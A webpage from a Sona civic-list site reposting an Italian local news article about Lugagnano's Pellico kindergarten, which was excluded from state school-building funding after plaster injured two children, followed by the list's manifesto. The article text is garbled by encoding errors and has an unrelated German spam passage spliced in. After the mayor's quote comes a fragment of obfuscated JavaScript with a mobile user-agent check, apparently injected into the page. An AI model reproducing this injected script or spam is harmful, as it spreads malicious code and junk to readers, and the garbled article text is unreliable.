L’Arena – SONA. La scuola materna di Lugagnano esclusa dalla lista per gli interventi urgenti di edilizia.

Niente soldi alle Pellico: Ai??Renzi, ripensaciAi??
Di Federica Valbusa

Il governo non concede al Comune di sforare il patto di stabilitAi??. Eppure in un’aula cadde l’intonaco che colpAi?? due piccole alunne

Quest’inverno, alla Ai??Silvio PellicoAi?? era stata sfiorata la tragedia. Un pezzo di intonaco si era staccato dal soffitto, ferendo due bambine. L’episodio aveva messo in evidenza la necessitAi?? di una struttura piA? moderna e piA? sicura. Nonostante questo, la scuola di Lugagnano A? stata esclusa dal piano per l’edilizia scolastica promosso dal governo. L’amministrazione del sindaco Gianluigi Mazzi aveva chiesto la possibilitAi?? di sforare il patto di stabilitAi?? per costruire un nuovo edificio o, in alternativa, per realizzare lavori di miglioramento sismico e di manutenzione generale della struttura esistente. Il Comune di Sona, perA?, non A? stato inserito fra quelli veronesi che potranno beneficiare di questo diritto. Ora, il primo cittadino ha chiesto a Matteo Renzi di ripensarci. Questa volta, Mazzi ha fatto riferimento esclusivamente alla soluzione di intervento legata all’ipotesi di costruire un nuovo edificio. Al Comune i soldi non mancano. CiA? che manca A? la possibilitAi?? di utilizzarli. Senza la deroga al patto di stabilitAi??, l’amministrazione ha le mani legate. Nella lettera inviata nei giorni scorsi al presidente del consiglio, il sindaco ha spiegato che la struttura, costruita negli anni Sessanta ed interessata da successivi ampliamenti, Ai??non pare piA? essere all’altezza dell’edilizia scolastica modernaAi??. Mazzi ha nuovamente segnalato quanto accaduto a febbraio, quando il distaccamento di una porzione di intonaco dal soffitto di un’aula della materna aveva provocato turbamento fra le famiglie della frazione. La nuova struttura dovrebbe essere costruita nel polo di via Carducci, dove hanno sede il nido e la secondaria di primo grado. Il costo previsto A? di otto milioni e mezzo. Il Comune potrebbe sostenere oltre i due terzi della spesa, qualora tali fondi venissero esclusi dal patto di stabilitAi??. Per la quota rimanente, pari a due milioni e 600 mila euro, l’amministrazione chiede invece il finanziamento statale. L’opera verrebbe edificata al massimo in quattro anni.
Ai??Warum wird der kstenschutz auf der insel unterschiedlich gehandhabt die schlerinnen und ghostwriter gesucht schler sollten die karte gestalten und mit einer legende versehen diese aufgabe dient zum aufbau und zur vertiefung der kartierungskompetenz.Gli interventiAi??, ha scritto Mazzi al governo, Ai??sono urgenti, cosAi?? come la necessitAi?? di avere chiarezza per il futuro, soprattutto per un Comune virtuoso come il nostro che non ha mai sforato il patto di stabilitAi??Ai??. k\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){

Comments are closed.

Un nuovo futuro perSona

Ci accomuna un bisogno: quello di creare un nuovo modo di appartenere alla comunità.
Una strada concreta fatta di conoscenza, esperienza e analisi, elementi necessari allo sviluppo di nuove proposte solide e realizzabili.

Ci accomuna un forte senso di appartenenza a questa comunità che ci ha sempre visto coinvolti in prima persona in attività di interesse sociale e politico.
Attività che ci hanno preparato e motivato nel voler tradurre in realtà amministrativa un progetto libero dalle tattiche e dalle strategia di partito.

Ci accomuna l’esperienza e la competenza nei diversi settori stimolo per una nuova amministrazione basata su una programmazione attenta dei bisogni quotidiani ed essenziali dei cittadini; sull’ottimizzazione e la valorizzazione delle risorse e sull’identificazione di un programma di sviluppo del territorio.

Ci accomuna la voglia di fare, di provare a creare un futuro che è nostro e dei nostri figli, senza interessi, ma con lo spirito di servizio tipico del volontariato.

Ci muove la speranza di coinvolgere chi, come noi, ha voglia di rompere gli schemi della vecchia guardia politica e vuole rinnovare Sona e e sue frazioni per davvero.